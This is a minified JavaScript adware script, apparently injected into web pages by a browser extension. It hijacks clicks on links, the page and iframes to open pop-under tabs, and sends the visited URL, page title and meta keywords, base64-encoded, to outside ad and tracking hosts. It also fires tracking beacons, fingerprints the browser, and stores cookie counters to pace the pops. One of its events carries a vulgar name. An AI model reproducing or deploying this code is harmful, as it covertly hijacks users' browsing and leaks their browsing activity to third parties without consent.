_GPL.j(function(h,c,na,x,k,e,y,oa,pa,N,aa,u,Na,qa,z,ra,l,sa,P,ta,v,p,ua,A,q,Oa,Pa){function Q(){va(g,P,Q);Qa(function(a,b){f=a;R||(R=!0,Ra(),ba(),wa(g,P,ba),xa=qa(function(){36E5<+new k-ya&&S(!1)},5E3))})}function ba(){ya=+new k}function S(a){R&&(R=!1,na(xa),Sa(),va(g,P,ba),a||wa(g,P,Q))}function wa(a,b,d){if(l[sa])a[sa](b,d,!1);else a.attachEvent("on"+b,d)}function Ra(){ca=!0;h(da).children().add("body,a").add(l).on(I,T);h("iframe").each(function(a,b){try{h(b.contentWindow).on(I,T)}catch(d){}});
if(U)try{c.log("Attempting to pop from extension to: "+f);var a="ld893_"+(B?"_"+e(B)+"_":"")+"_"+w(),b=c.proto+c.baseCDN+"/pwn.html?u="+e(f)+"&n="+a+"&r=";"h"!=U||J?"w"!=U||J||(J=!0,ea(l,"openThatTabBitch",{url:b,isUnder:!1,attr:"z7b85_91c4"}),z(function(){J=!1},100)):(J=!0,ea(g,"createNewTab",{url:b,focused:"true"}),ea(g.documentElement,"createNewTab",{url:b,focused:"true"}),z(function(){J=!1},100));var d=qa(function(){g.documentElement.getAttribute("z7b85_91c4")&&(na(d),S(!0),za(),g.documentElement.removeAttribute("z7b85_91c4"))},
50)}catch(Ta){}}function ea(a,b,d){if(g.createEvent){var c=g.createEvent("CustomEvent");c.initCustomEvent(b,!1,!1,d);a.dispatchEvent(c)}else c=g.createEventObject(),c.detail=d,c.realType=b,a.fireEvent("ondataavailable",c)}function C(a){a=aa.userAgent.match(Na(a+"[/ ](\\d+)","i"));return(a&&a[1])|0}function Ua(){if(C("Chrome")){for(var a=0;a<aa.plugins.length;a++)if("Widevine Content Decryption Module"==aa.plugins[a].name)return!1;return!0}return!1}function Va(a){if(f!=Aa){a=a.target||a.srcElement;
for(var b="";a;){K||(K=a.tagName);if("A"==a.tagName&&a.href&&a.protocol.toLowerCase().match(/^http/)){b=a.protocol+"//"+a.host+a.pathname+a.search+a.hash;break}a=a.parentNode}b&&(f+="&t="+e(b.substring(0,Math.max(0,1500-f.length))));f+="&rt="+(+new k-Ba);K&&(f+="&data_tag="+e(K));"/"!=y.pathname&&(f+="&mk="+e(c.B64.encode(fa().substring(0,Math.max(0,1500-f.length)))))}c.log("Popping to: "+f);a="ld893_"+(B?"_"+e(B)+"_":"")+"_"+w();if(b=l.open("","_blank"))b.name=a,b.location.href=f;return b}function fa(){function a(a){return a.toLowerCase().replace(/[.,!?]/g,
" ").split(" ")}var b=[];h("title").length&&(b=b.concat(a(h("title").text())));h('meta[property="og:title"],meta[property="og:description"],meta[name="description"],meta[name="keywords"]').each(function(){var d=h.trim(h(this).attr("content"));d&&d.match(/^\s*[a-zA-Z0-9]/)&&(b=b.concat(a(d)))});return h.trim(function(a){var b=[];h.each(a,function(a,d){-1==h.inArray(d,b)&&b.push(d)});return b}(b).join(",").replace(/([,]+)/g,",").replace(/\s+/g," "))}function Ca(){var a=y.href.substr(0,1500),b="/"!=
y.pathname?fa():"",a=a.replace(/:/g,"%3A"),b=b.replace(/:/g,"%3A").substring(0,Math.max(0,1500-a.length)),d=c.getSubId?"&subid="+c.getSubId("z7b85"):"",a=e(c.B64.encode(a+"::z-"+E+"-"+Da+"::"+b)),b="&cb="+ga,b=b+("&data_fr="+(Ea(r)?"false":"true"));return c.proto+Fa+"/pops?c="+a+"&a=1&ch="+e(O)+d+b}function va(a,b,d){if(l[ta])a[ta](b,d,!1);else a.detachEvent("on"+b,d)}function Sa(){ca=!1;h(da).children().add("body,a").add(l).off(I,T);h("iframe").each(function(a,b){try{h(b.contentWindow).off(I,T)}catch(d){}})}
function Wa(a){a=a||l.event||{};if(U&&g.documentElement.getAttribute("z7b85_91c4"))return!0;for(a=a.target||a.srcElement;a;){if(a["91c4"])return!0;a=a.parentNode}return!1}function L(a,b){a=u(a,10);isNaN(a)&&(a=u(V&&V.getItem(b)||c.gc(b,10),10)||0);return a}function Ea(a){return(new k(1E3*(a||0))).toDateString()==(new k).toDateString()}function W(){r|=0;m|=0;F|=0;var a=w(),b=m&&!Ea(r);b&&(m=0,n.set(q,m));var d=!G||a-r>=H&&m<G,a=a-F>=s;return!t&&b||d&&a}function T(a){if(!Wa(a)){var b=ca&&Xa(),d=b&&
Va(a);if(b&&"mousedown"==a.type&&Ga)try{a.target.click()}catch(Ta){}d&&!d.closed?(S(!0),za(),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popsuccess&u="+e(f)+"&cid="+c.vars.cid+"&pid="+E+"&r="+999999999*Math.random(),X&&x(X),Y&&x(Y)):d&&d.closed?Y||(Y=z(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popclose&u="+e(f)+"&location="+e(y.hostname)+"&pid="+E+"&tag="+e(K||"")+"&r="+999999999*Math.random()},1E3)):b&&(X||(X=z(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfail&u="+
e(f)+"&location="+e(y.hostname)+"&pid="+E+"&tag="+e(K||"")+"&r="+999999999*Math.random()},1E3)))}}function Xa(){if(!n.swf)return!0;r=L(n.get(v),v);316808>Ha.score&&(m=L(n.get(q),q));var a=Ia(n.get(p));F=L(a[M],p);return W()}function w(){return oa(new k/1E3)}function Ja(a,b,d){n.set(a,d);d=w();V&&V.setItem(a,d);b=u(b,10);var c=new k;c.setSeconds(c.getSeconds()+b);g.cookie=a+"="+d+";expires="+c.toUTCString()+";path=/;domain="+M}function za(){var a=w();Ja(v,H,a);n.set(Oa,a);r=a;n.set(q,++m);s&&Ja(p,
s,Z+(Z&&",")+M+":"+a)}function Ia(a){var b={},d=w(),c=[];a=(a||"").split(",");if(a.length){for(var e=0;e<a.length;++e){var f=a[e].split(":"),g=u(f[1],10);d-g<s&&(b[f[0]]=g,c.push(f[0]+":"+g))}Z=c.join(",");n.set(p,Z)}return b}function ha(){return W()||t?1:w()-(u(F,10)||0)<s?Infinity:m>=G?"US"==c.vars.cid?149058:-1<["CA","GB","AU","FR","IT"].indexOf(c.vars.cid)?88620:59858:"US"==c.vars.cid?47432:-1<["CA","GB","AU","FR","IT"].indexOf(c.vars.cid)?59858:49928}function Ya(a){"US"==c.vars.cid?ia(a,47432,
149058):-1<["CA","GB","AU","FR","IT"].indexOf(c.vars.cid)?ia(a,59858,88620):ia(a,49928,59858);return W()}function ia(a,b,c){a>=b&&(H=0,a>=c&&m>=G&&(m=pa(0,G-1)))}function Ka(){x(ja);if(!t&&1735!=E){var a=ha(),b="http://clkmon.com/adServe/banners?pid=14442&cid="+Da+"&action=r&q=",c="/"!=y.pathname?fa():"",b=b+e(c.substring(0,Math.max(0,1500-b.length)));l[ga]({url:b,score:a});(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfallback&u="+e(y.hostname)+"&r="+999999999*Math.random()}}function Qa(a){!function d(){c.gc(ua)||
n.get(["frt","_GPL_oo_z7b85",v,p,q,Pa],function(e){if(e.v.frt){if("1750"==E){var f=u(e.v._GPL_oo_z7b85,10)||0;if(86400>oa(new k/1E3)-f)return}l[ga]=function(c){Za(c,a)};f=w();r=L(e.v[v],v);m=L(e.v[q],q);e=Ia(e.v[p]);F=L(e[M],p);if(W()){e=ha();ka=+new k;var h=g.createElement("script");h.src=Ca()+"&ms="+e+"&r="+f;h.onerror=Ka;da.appendChild(h);ja=z(Ka,15E3)}else e=ha(),c.log("minScoreNeeded: "+e),Infinity>e&&!La&&!t&&(ka=+new k,c.insertJS(Ca()+"&ms="+e+"&r="+f),La=!0),x(la),la=z(d,1E3*(5+pa(f,r+H,F+
s)-f))}})}()}function Za(a,b){x(ja);var d=+new k-ka;B="";a&&(a.cid&&(B=a.cid,a.url||(a.url=c.proto+Fa+"/click?c="+e(B),a.url+=c.getSubId?"&subid="+c.getSubId("z7b85"):"",a.url+=ma?"&data_test="+e(ma):"",a.url+="&data_fb="+(Ua()?"yes":"no"),a.url+="&data_rtt="+d,a.url+="&data_ss="+(screen.availHeight||0)+"x"+(screen.availWidth||0))),t&&!a.cid&&(a.url=Aa,a.cid="xr"),d=u(a.score,10),t||0<d&&Ya(d))&&(Ba=+new k,x(la),a.url&&a.expires&&(x(Ma),Ma=z(function(){S(!0);Q()},1E3*u(a.expires,10))),Ha={score:d,
now:new k/1},b(a.url,d))}var n=c.items.e6a00,g=l.document,da=g.body,V=l.localStorage,Ga=C("chrome");N=C("firefox");C("opera");ra=C("safari");C("webkit");var O=c.item_vars["22555_ch"]||c.item_vars.ch||"",H,r,F;A=(A=c.dt())&&A.inherited&&A.inherited.t||[];var t="x"==O||-1<A.indexOf("adult")||0==A.length&&0<h('meta[content="RTA-5042-1996-1400-1577-RTA"]').length;t&&(-1==A.indexOf("adult_block")?O="x":(O="x-issue",t=!1));var s,Fa="s.ptrk-wn.com",R=!1,xa,ya,ca=!1,M=c.gd(),f,Ba=0,ka=0,Ma,Z="",m=0,G,Ha=
{},B="",la,La=!1,ma,X,Y,ja,K,I="click";if(Ga||ra)I="mousedown";else if(N||g.all||C("trident"))I="mouseup";N=c.zoneid("z7b85",!0).split("_");var Da=N[0],E=N[1]||c.vars.pid,Aa="http://secure.xsrving.com/display?size=800x600&ch="+e(O)+"&referer="+e(M),U=!1,J=!1,ga=c.rs(20);c.canLoad("ld893")||c.gc(ua)||(l.name||"").match(/^a652c_/)||1797==E&&"GB"==c.vars.cid||"facebook.com"==M||(t?(G=H=0,s=180,v+="_xr",p+="_xr",q+="_xr"):(H=360,G=4,s=360,"t1"==c.vars.wptg&&(ma="wp_t1",s=H=180)),Q())},_GPL,clearInterval,
clearTimeout,Date,encodeURIComponent,location,Math.floor,Math.max,Math.random,navigator,parseInt,RegExp,setInterval,setTimeout,void 0,window,"addEventListener","mousemove","removeEventListener","ld893_pop_g","ld893_pop_s","z7b85_bl1","ld893_s","ld893_pop_gs","ld893_spopd","z7b85_test");
